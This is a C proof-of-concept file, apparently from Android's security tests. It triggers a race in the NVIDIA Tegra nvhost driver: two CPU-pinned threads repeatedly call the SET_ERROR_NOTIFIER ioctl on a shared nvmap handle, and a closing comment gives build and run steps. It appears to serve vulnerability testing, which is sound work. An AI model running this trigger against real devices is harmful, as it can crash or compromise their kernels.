/*
 * Copyright (C) 2016 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#define _GNU_SOURCE

#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/types.h>
#include <sys/ioctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/types.h>

/*
 * PoC for a race on NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER: the main thread
 * opens /dev/nvhost-vic and /dev/nvmap and allocates an nvmap handle, then
 * two threads pinned to different CPUs hammer the set-error-notifier ioctl
 * against that same handle in parallel.
 */

/* nvhost channel ioctl arguments (from the Tegra nvhost UAPI). */
struct nvhost_channel_open_args {
    __s32 channel_fd;
};

struct nvhost_set_error_notifier {
    __u64 offset;
    __u64 size;
    __u32 mem;
    __u32 padding;
};

#define NVHOST_IOCTL_MAGIC 'H'
#define NVHOST_IOCTL_CHANNEL_OPEN \
    _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \
    _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)

/* nvmap handle ioctl arguments (from the Tegra nvmap UAPI). */
struct nvmap_create_handle {
    union {
        __u32 id;   /* FromId */
        __u32 size; /* CreateHandle */
        __s32 fd;   /* DmaBufFd or FromFd */
    };
    __u32 handle;   /* returns nvmap handle */
};

struct nvmap_alloc_handle {
    __u32 handle;    /* nvmap handle */
    __u32 heap_mask; /* heaps to allocate from */
    __u32 flags;     /* wb/wc/uc/iwb etc. */
    __u32 align;     /* min alignment necessary */
};

#define NVMAP_HEAP_IOVMM            (1ul << 30) /* needed by NVMAP_HEAP_CARVEOUT_MASK below */
#define NVMAP_HEAP_CARVEOUT_IRAM    (1ul << 29)
#define NVMAP_HEAP_CARVEOUT_VPR     (1ul << 28)
#define NVMAP_HEAP_CARVEOUT_TSEC    (1ul << 27)
#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul << 0)
#define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)

/* allocation flags */
#define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
#define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
#define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
#define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)
#define NVMAP_HANDLE_SECURE          (0x1ul << 2)
#define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
#define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
#define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
#define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)

#define NVMAP_IOC_MAGIC 'N'
#define NVMAP_IOC_ALLOC  _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)

/*
 * Creates a new memory handle. On input, the argument is the size of the new
 * handle; on return, the argument is the name of the new handle.
 */
#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
#define NVMAP_IOC_FREE   _IO(NVMAP_IOC_MAGIC, 4)

int g_fd = -1;       /* /dev/nvhost-vic */
int g_nvmap_fd = -1; /* /dev/nvmap */
static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
int g_channel_fd = -1;
struct nvhost_set_error_notifier g_error_notifier;
struct nvmap_create_handle g_nvmap_hdl;
struct nvmap_alloc_handle g_real_alloc = {0};

int open_driver(void) {
    const char *dev_path = "/dev/nvhost-vic";

    g_fd = open(dev_path, O_RDONLY);
    if (g_fd < 0) {
        printf("open file(%s) failed, errno=%d\n", dev_path, errno);
        return -1;
    } else {
        printf("open file(%s) succ!\n", dev_path);
    }

    dev_path = "/dev/nvmap";
    g_nvmap_fd = open(dev_path, O_RDONLY);
    if (g_nvmap_fd < 0) {
        printf("open file(%s) failed, errno=%d\n", dev_path, errno);
        return -1;
    } else {
        printf("open file(%s) succ!\n", dev_path);
    }

    return 1;
}

void trigger_channel_open(void) {
    struct nvhost_channel_open_args args = {-1};
    ioctl(g_fd, NVHOST_IOCTL_CHANNEL_OPEN, &args);
    g_channel_fd = args.channel_fd;
}

int trigger_nvmap_create(void) {
    /* Create a 0x1000-byte nvmap handle; the handle id comes back in g_nvmap_hdl.handle. */
    g_nvmap_hdl.size = 0x1000;
    ioctl(g_nvmap_fd, NVMAP_IOC_CREATE, &g_nvmap_hdl);
    return g_nvmap_hdl.handle;
}

void trigger_nvmap_free(void) {
    int data = g_nvmap_hdl.handle;
    ioctl(g_nvmap_fd, NVMAP_IOC_FREE, data);
}

void trigger_nvmap_alloc(int handle) {
    /* Back the handle with zeroed pages from the generic carveout heap. */
    g_real_alloc.align = 0x1000;
    g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
    g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
    g_real_alloc.handle = handle;
    ioctl(g_nvmap_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
}

void prepare_data(void) {
    /* Point the error notifier at the nvmap handle allocated above. */
    g_error_notifier.offset = 0;
    g_error_notifier.mem = g_nvmap_hdl.handle;
}

void trigger_set_error_notifier(void) {
    ioctl(g_fd, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &g_error_notifier);
}

void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
    setpriority(PRIO_PROCESS, gettid(), privi);

    /* Bind the calling thread to the CPUs in cpu_mask (raw affinity bitmask). */
    if (sched_setaffinity(gettid(), sizeof(cpu_mask), (cpu_set_t *)&cpu_mask) < 0) {
        /* Non-fatal: keep going even if pinning fails. */
    }
}

void *race_thread(void *arg) {
    /* Try to raise priority and pin to CPU 1 (affinity mask 0x2). */
    setup_privi_and_affinity(-19, 2);

    /* Park on the condvar so both racers start at the main thread's broadcast. */
    pthread_mutex_lock(&mutex);
    pthread_cond_wait(&cond, &mutex);
    pthread_mutex_unlock(&mutex);

    while (1) {
        trigger_set_error_notifier();
    }
    return NULL;
}

void *race_thread_2(void *arg) {
    /* Same loop, pinned to CPU 0 (affinity mask 0x1), so the ioctls race on two cores. */
    setup_privi_and_affinity(-19, 1);

    pthread_mutex_lock(&mutex);
    pthread_cond_wait(&cond, &mutex);
    pthread_mutex_unlock(&mutex);

    while (1) {
        trigger_set_error_notifier();
    }
    return NULL;
}

int main(int argc, char **argv) {
    setup_privi_and_affinity(0, 1);

    if (open_driver() < 0) {
        return -1;
    }

    //trigger_nvmap_create();
    trigger_nvmap_alloc(trigger_nvmap_create());
    prepare_data();
    //trigger_nvmap_free();

    pthread_t tid;
    pthread_create(&tid, NULL, race_thread, NULL);
    pthread_create(&tid, NULL, race_thread_2, NULL);

    /* Give both racers time to park on the condvar, then release them together. */
    usleep(100 * 1000);
    pthread_cond_broadcast(&cond);

    sleep(100);
    return 0;
}
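/*
 * Usage sketch (assumptions, not part of the original PoC): build with an
 * Android-targeted clang, e.g. "clang -pie poc.c -o poc", push the binary to
 * a Tegra device that exposes /dev/nvhost-vic and /dev/nvmap, and run it from
 * an adb shell; the two threads then race on the error-notifier ioctl.
 */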